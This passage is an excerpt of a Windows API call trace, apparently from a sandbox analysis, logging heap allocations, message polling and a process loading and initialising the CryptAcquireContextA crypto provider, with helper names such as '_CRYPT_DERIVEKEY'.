Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.570] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0268.570] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0268.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0268.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0268.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0268.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.572] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0268.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0268.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0268.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0268.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.575] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0268.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0268.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0268.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69bc8 [0268.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69bc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0268.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0268.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0268.575] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0268.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0268.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0268.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.576] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.578] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.579] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.579] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.579] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0268.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.580] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.580] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.580] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.580] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0268.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.581] PeekMessageW (in: lpMsg=0x8cf3b8, 